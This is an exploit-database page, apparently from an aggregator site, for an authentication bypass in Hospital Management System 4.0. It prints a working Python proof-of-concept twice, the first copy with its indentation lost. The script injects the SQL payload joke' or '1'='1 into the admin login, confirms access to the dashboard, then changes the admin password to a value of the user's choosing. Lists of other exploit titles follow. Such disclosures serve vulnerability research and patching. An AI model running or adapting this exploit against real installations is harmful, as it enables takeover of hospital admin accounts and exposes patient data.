Search for hundreds of thousands of exploits

"Hospital Management System 4.0 - Authentication Bypass"

Author

Exploit author

"Metin Yunus Kandemir"

Platform

Exploit platform

php

Release date

Exploit published date

2020-01-01

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
# Exploit Title: Hospital Management System 4.0 - Authentication Bypass
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/hospital-management-system-in-php/
# Version: v4.0
# Category: Webapps
# Tested on: Xampp for Windows

# Description:
# Password and username parameters have sql injection vulnerability on admin panel.
# username: joke' or '1'='1 , password: joke' or '1'='1
# Exploit changes password of admin user.



#!/usr/bin/python

import requests
import sys


if (len(sys.argv) !=2) or sys.argv[1] == "-h":
print "[*] Usage: PoC.py rhost/rpath"
print "[*] e.g.: PoC.py 127.0.0.1/hospital"
exit(0)

rhost = sys.argv[1]

npasswd = str(raw_input("Please enter at least six characters for new password: "))

url = "http://"+rhost+"/hms/admin/index.php"
data = {"username": "joke' or '1'='1", "password": "joke' or '1'='1", "submit": "", "submit": ""}


#login

with requests.Session() as session:
lpost = session.post(url=url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})

#check authentication bypass

check = session.get("http://"+rhost+"/hms/admin/dashboard.php", allow_redirects=False)
print ("[*] Status code: %s"%check.status_code)

if check.status_code == 200:
print "[+] Authentication bypass was successful!"
print "[+] Trying to change password."
elif check.status_code == 404:
print "[-] One bad day! Check target web application path."
sys.exit()
else:
print "[-] One bad day! Authentication bypass was unsuccessful! Try it manually."
sys.exit()

#change password

cgdata = {"cpass": "joke' or '1'='1", "npass": ""+npasswd+"", "cfpass": ""+npasswd+"","submit":""}
cgpasswd = session.post("http://"+rhost+"/hms/admin/change-password.php", data=cgdata, headers = {"Content-Type": "application/x-www-form-urlencoded"})
if cgpasswd.status_code == 200:
print ("[+] Username is: admin")
  print ("[+] New password is: %s"%npasswd)
        else:
print "[-] One bad day! Try it manually."
sys.exit()

hospital_poc.py

#!/usr/bin/python

import requests
import sys


if (len(sys.argv) !=2) or sys.argv[1] == "-h":
	print "[*] Usage: PoC.py rhost/rpath"
	print "[*] e.g.: PoC.py 127.0.0.1/hospital"
	exit(0) 

rhost = sys.argv[1]

npasswd = str(raw_input("Please enter at least six characters for new password: "))

url = "http://"+rhost+"/hms/admin/index.php"
data = {"username": "joke' or '1'='1", "password": "joke' or '1'='1", "submit": "", "submit": ""} 


#login

with requests.Session() as session:
	lpost = session.post(url=url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
	
	#check authentication bypass

	check = session.get("http://"+rhost+"/hms/admin/dashboard.php", allow_redirects=False)
	print ("[*] Status code: %s"%check.status_code)

	if check.status_code == 200:
		print "[+] Authentication bypass was successful!"
		print "[+] Trying to change password."
	elif check.status_code == 404:
		print "[-] One bad day! Check target web application path."
		sys.exit()
	else:
		print "[-] One bad day! Authentication bypass was unsuccessful! Try it manually."
		sys.exit()
	
	#change password

	cgdata = {"cpass": "joke' or '1'='1", "npass": ""+npasswd+"", "cfpass": ""+npasswd+"","submit":""}
	cgpasswd = session.post("http://"+rhost+"/hms/admin/change-password.php", data=cgdata, headers = {"Content-Type": "application/x-www-form-urlencoded"})
	if cgpasswd.status_code == 200:
		print ("[+] Username is: admin")
  		print ("[+] New password is: %s"%npasswd)
        else:
		print "[-] One bad day! Try it manually."
		sys.exit()
Release DateTitleTypePlatformAuthor
2020-07-02"WhatsApp Remote Code Execution - Paper"webappsandroid"ashu Jaiswal"
2020-07-02"ZenTao Pro 8.8.2 - Command Injection"webappsphp"Daniel Monzón"
2020-07-02"OCS Inventory NG 2.7 - Remote Code Execution"webappsmultipleAskar
2020-07-01"Online Shopping Portal 3.1 - Authentication Bypass"webappsphp"Ümit Yalçın"
2020-07-01"e-learning Php Script 0.1.0 - 'search' SQL Injection"webappsphpKeopssGroup0day_Inc
2020-07-01"PHP-Fusion 9.03.60 - PHP Object Injection"webappsphpcoiffeur
2020-07-01"RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)"localwindows"Paras Bhatia"
2020-06-30"Reside Property Management 3.0 - 'profile' SQL Injection"webappsphp"Behzad Khalifeh"
2020-06-30"Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting"webappsphp"Anushree Priyadarshini"
2020-06-26"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path"localwindows"Ethan Seow"
Release DateTitleTypePlatformAuthor
2020-07-02"ZenTao Pro 8.8.2 - Command Injection"webappsphp"Daniel Monzón"
2020-07-01"Online Shopping Portal 3.1 - Authentication Bypass"webappsphp"Ümit Yalçın"
2020-07-01"e-learning Php Script 0.1.0 - 'search' SQL Injection"webappsphpKeopssGroup0day_Inc
2020-07-01"PHP-Fusion 9.03.60 - PHP Object Injection"webappsphpcoiffeur
2020-06-30"Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting"webappsphp"Anushree Priyadarshini"
2020-06-30"Reside Property Management 3.0 - 'profile' SQL Injection"webappsphp"Behzad Khalifeh"
2020-06-26"OpenEMR 5.0.1 - 'controller' Remote Code Execution"webappsphp"Emre ÖVÜNÇ"
2020-06-25"FHEM 6.0 - Local File Inclusion"webappsphp"Emre ÖVÜNÇ"
2020-06-23"Responsive Online Blog 1.0 - 'id' SQL Injection"webappsphp"Eren Şimşek"
2020-06-23"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)"webappsphpBKpatron
Release DateTitleTypePlatformAuthor
2020-04-21"CSZ CMS 1.2.7 - Persistent Cross-Site Scripting"webappsphp"Metin Yunus Kandemir"
2020-04-21"CSZ CMS 1.2.7 - 'title' HTML Injection"webappsphp"Metin Yunus Kandemir"
2020-03-20"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)"webappsphp"Metin Yunus Kandemir"
2020-01-07"Complaint Management System 4.0 - Remote Code Execution"webappsphp"Metin Yunus Kandemir"
2020-01-03"Online Course Registration 2.0 - Remote Code Execution"webappsphp"Metin Yunus Kandemir"
2020-01-01"Shopping Portal ProVersion 3.0 - Authentication Bypass"webappsphp"Metin Yunus Kandemir"
2020-01-01"Hospital Management System 4.0 - Authentication Bypass"webappsphp"Metin Yunus Kandemir"
2019-12-09"Snipe-IT Open Source Asset Management 4.7.5 - Persistent Cross-Site Scripting"webappsphp"Metin Yunus Kandemir"
2019-09-13"Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting"webappsphp"Metin Yunus Kandemir"
2019-09-09"Dolibarr ERP-CRM 10.0.1 - SQL Injection"webappsphp"Metin Yunus Kandemir"
2019-09-09"Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection"webappsphp"Metin Yunus Kandemir"
2019-08-01"Ultimate Loan Manager 2.0 - Cross-Site Scripting"webappsmultiple"Metin Yunus Kandemir"
2019-07-12"MyT Project Management 1.5.1 - User[username] Persistent Cross-Site Scripting"webappsphp"Metin Yunus Kandemir"
2019-06-24"dotProject 2.1.9 - SQL Injection"webappsphp"Metin Yunus Kandemir"
2019-05-29"Free SMTP Server 2.5 - Denial of Service (PoC)"doswindows"Metin Yunus Kandemir"
2019-04-03"PhreeBooks ERP 5.2.3 - Remote Command Execution"remotepython"Metin Yunus Kandemir"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47836/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.